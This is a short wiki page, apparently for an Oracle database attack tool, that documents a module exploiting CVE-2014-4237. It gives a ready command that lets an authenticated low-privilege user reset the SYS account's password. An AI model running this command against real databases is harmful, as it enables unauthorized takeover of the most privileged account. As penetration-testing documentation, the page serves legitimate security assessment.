-
Notifications
You must be signed in to change notification settings - Fork 343
quentinhardy edited this page Mar 24, 2016
·
2 revisions
This module can be used to exploit these following CVE:
- CVE-2014-4237: A user authenticated can modify all tables who can select even if he has not the privilege to modify them normally (no ALTER privilege).
For example, the following command can be used to set the SYS's password:
./odat.py cve -s $HOST -d $SID -U $LOGIN -P $PASSWORD --set-pwd-2014-4237 'SYS' 'oracle' With this command, the SYS's password is 'oracle' now. The database must be restarted in order to the database reloads hashes!
Quentin HARDY: quentin.hardy@bt.com or qhardyfr@gmail.com